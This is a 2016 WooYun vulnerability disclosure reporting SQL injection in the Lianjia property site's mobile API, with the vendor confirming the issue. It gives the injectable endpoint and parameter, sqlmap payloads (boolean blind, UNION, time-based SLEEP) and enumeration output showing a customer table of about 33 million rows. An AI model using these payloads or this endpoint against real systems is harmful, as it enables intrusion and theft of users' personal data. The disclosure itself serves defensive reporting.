当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0197762

漏洞标题:链家网存在SQL注入漏洞(主站数据库/3300万用户)

相关厂商:链家网

漏洞作者: 猪猪侠

提交时间:2016-04-18 12:28

修复时间:2016-06-04 23:10

公开时间:2016-06-04 23:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-18: 细节已通知厂商并且等待厂商处理中
2016-04-20: 厂商已经确认,细节仅向厂商公开
2016-04-30: 细节向核心白帽子及相关领域专家公开
2016-05-10: 细节向普通白帽子公开
2016-05-20: 细节向实习白帽子公开
2016-06-04: 细节向公众公开

简要描述:

链家网存在SQL注入漏洞,主站数据库,可UNION,影响3300万用户信息

详细说明:

#1 影响服务器
http://m.api.lianjia.com
#2 注入点
http://m.api.lianjia.com/web/ershoufang/sidebar?callback=jQuery1111010487171867862344_1460815277788&cityId=320100&id=320100&uuid=62bf4246-294e-457f-9790-8bc572c0886f&ucid=&type=city&_=1460815277789
#3 注入参数
cityId

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: cityId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: callback=jQuery111104495485157240182_1460843660050&cityId=120000) AND 2210=2210 AND (5341=5341&id=120000&type=city&_=1460843660051
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: callback=jQuery111104495485157240182_1460843660050&cityId=120000) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b716271,0x4b566d736b4677585a46,0x716a7a7071)#&id=120000&type=city&_=1460843660051
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: callback=jQuery111104495485157240182_1460843660050&cityId=120000) AND SLEEP(5) AND (2001=2001&id=120000&type=city&_=1460843660051
---
[12:24:27] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11


available databases [8]:
mask 区域
*****ssio*****
*****aic*****
*****dic*****
*****tion_s*****
*****ian*****
*****esmg*****
*****est*****
*****ser*****


Database:
mask 区域
*****nj*****
*****tab*****
*****----------*****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ew *****
*****y *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****d *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ds *****
***** *****
***** *****
*****g_code *****
***** *****
*****n *****
***** *****
***** *****
***** *****
***** *****
*****nt *****
*****relation *****
*****relation_n*****
*****ld *****
***** *****
*****nt *****
***** *****
*****ry *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****t *****
*****nts *****
*****se *****
*****e *****
*****e_picture *****
*****ord *****
***** *****
***** *****
***** *****
*****on *****
***** *****
*****house *****
*****resblock *****
***** *****
*****_city *****
*****ndency *****
*****ess *****
***** *****
*****mment *****
*****rite *****
***** *****
***** *****
*****t *****
*****t_setting *****
*****lect *****
*****account *****
*****transactio*****
*****ion_activi*****
*****ion_activi*****
*****ion_code *****
*****ion_histor*****
*****ion_reward*****
***** *****
*****category *****
*****history *****
*****n *****
***** *****
***** *****
***** *****
*****ate *****
***** *****
*****classify *****
*****image *****
*****state *****
***** *****
***** *****
*****nt *****
***** *****
*****age *****
***** *****
*****p *****
***** *****
***** *****
*****signup *****
*****state *****
***** *****
*****age *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****g_group *****
*****_quality *****
*****_quality *****
*****uality *****
*****_quality *****
*****k_agent *****
*****k_quality *****
*****gent *****
***** *****
***** *****
*****0160314 *****
*****016314 *****
***** *****
***** *****
*****t_lib *****
***** *****
***** *****
*****t_detail *****
*****g *****
*****l *****
***** *****
*****t *****
***** *****
*****ontent *****
***** *****
*****l *****
***** *****
***** *****
***** *****
***** *****
*****_agent *****
***** *****
***** *****
*****nu *****
***** *****
***** *****
***** *****
*****enu *****
***** *****
***** *****
***** *****
*****_zhuanjia *****
***** *****
*****elation *****
*****ags *****
*****og *****
*****y *****
***** *****
***** *****


[12:30:00] [INFO] retrieved: 33318624
Database: lianjia
+---------------+---------+
| Table | Entries |
+---------------+---------+
| customer_info | 33318624 |
+---------------+---------+

修复方案:

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-04-20 23:00

厂商回复:

感谢!

最新状态:

暂无